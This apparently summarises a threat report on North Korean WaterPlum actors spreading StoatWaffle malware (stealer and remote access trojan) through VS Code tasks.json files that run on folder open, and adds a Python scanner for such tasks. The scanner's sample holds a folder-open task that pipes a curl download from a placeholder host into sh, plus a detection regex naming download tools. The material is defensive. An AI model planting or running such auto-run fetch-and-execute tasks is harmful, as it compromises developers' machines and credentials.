North Korean threat actors known as WaterPlum are using malicious Microsoft Visual Studio Code projects to distribute a malware family called StoatWaffle. These attacks leverage a specific configuration file to automatically execute malicious code and download payloads whenever a developer opens the infected project folder.
North Korean cyber operators associated with the Contagious Interview campaign have shifted their tactics to target developers through compromised Microsoft Visual Studio Code environments. Using a malware family identified as StoatWaffle, these actors embed malicious instructions in the project's tasks.json file. This configuration uses a setting that triggers the malware automatically the moment any file within the project directory is accessed, making the infection seamless and difficult for the user to detect during their normal workflow.
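The auto-run mechanism described above is VS Code's documented `runOptions.runOn: "folderOpen"` task setting, which the editor honours once the workspace has been trusted. The following scanner is an added example, not code from the report or from NTT: it parses a tasks.json (VS Code's JSONC dialect allows comments and trailing commas, and a naive comment stripper would break on the `//` inside a URL), lists every folder-open task, and flags those whose command line fetches from the network or spawns a runtime. The sample tasks.json and the `placeholder-project.vercel.app` host are constructed for the demonstration.

```python
import json
import pathlib
import re

# Constructed sample tasks.json (not from the real campaign): one normal build task
# and one shell task with runOptions.runOn = "folderOpen", which VS Code runs as
# soon as the folder is opened once workspace trust is granted.
SAMPLE_TASKS_JSON = r'''{
    // tasks.json is JSONC: comments and trailing commas are allowed
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        {
            "label": "prepare",
            "type": "shell",
            "command": "curl -s https://placeholder-project.vercel.app/init | sh",
            "runOptions": { "runOn": "folderOpen" },
        },
    ],
}'''

# Strings are matched first so the // inside a URL is kept; only real comments are dropped.
JSONC_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)
# Tokens suggesting an auto-run task fetches code or spawns a runtime.
SUSPICIOUS = re.compile(r"https?://|\b(curl|wget|iwr|Invoke-WebRequest|node|powershell)\b", re.I)

def strip_jsonc(text: str) -> str:
    """Convert VS Code's JSONC (comments, trailing commas) into strict JSON."""
    text = JSONC_TOKEN.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)
    return re.sub(r",(\s*[}\]])", r"\1", text)

def find_autorun_tasks(jsonc: str) -> list:
    """Return (label, command line, suspicious?) for every task that runs on folder open."""
    findings = []
    for task in json.loads(strip_jsonc(jsonc)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        findings.append((task.get("label"), cmd, bool(SUSPICIOUS.search(cmd))))
    return findings

def scan_workspaces(root: str) -> dict:
    """Map every .vscode/tasks.json below root to its folder-open findings."""
    return {str(p): find_autorun_tasks(p.read_text(encoding="utf-8"))
            for p in pathlib.Path(root).glob("**/.vscode/tasks.json")}

if __name__ == "__main__":
    for label, cmd, bad in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[{'SUSPICIOUS' if bad else 'auto-run'}] {label}: {cmd}")
```

Run `scan_workspaces` over a directory of freshly cloned repositories before opening any of them in the editor; a folder-open task that reaches out to the network is worth a manual look even when the rest of the project appears legitimate.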
Once triggered, the initial script connects to a web application hosted on Vercel to download additional components. The malware is designed to be cross-platform, meaning it can function on various operating systems even though many observed attacks target Windows users. Upon execution, the script first verifies the presence of Node.js on the host system. If the environment lacks this runtime, the malware silently downloads and installs the official version of Node.js to ensure it has the necessary infrastructure to run its subsequent stages.
After the environment is prepared, the malware launches a downloader that periodically communicates with an external server to retrieve further instructions. This process involves a multi-stage approach where the downloader repeatedly polls a command-and-control server for new Node.js code to execute. This behavior allows the attackers to maintain a persistent connection and update the malicious capabilities on the infected machine dynamically based on their current objectives.
The StoatWaffle framework typically deploys two primary malicious modules once it has established a foothold. The first is an information stealer designed to extract sensitive data from web browsers, including saved credentials and extension data from Chromium and Firefox. On macOS systems, this module is specifically programmed to target and exfiltrate the iCloud Keychain database. This highlights the focus of the threat actors on gathering high-value authentication data that can be used for further network penetration.
The second module is a remote access trojan that provides the attackers with comprehensive control over the compromised host. Through this tool, the actors can navigate the file system, upload or search for specific files, and execute arbitrary shell commands. This level of access enables the threat actors to conduct long-term espionage, steal intellectual property, or use the infected machine as a pivot point for broader attacks within a target organization.
Source: https://jp.security.ntt/insights_resources/tech_blog/stoatwaffle_malware_en/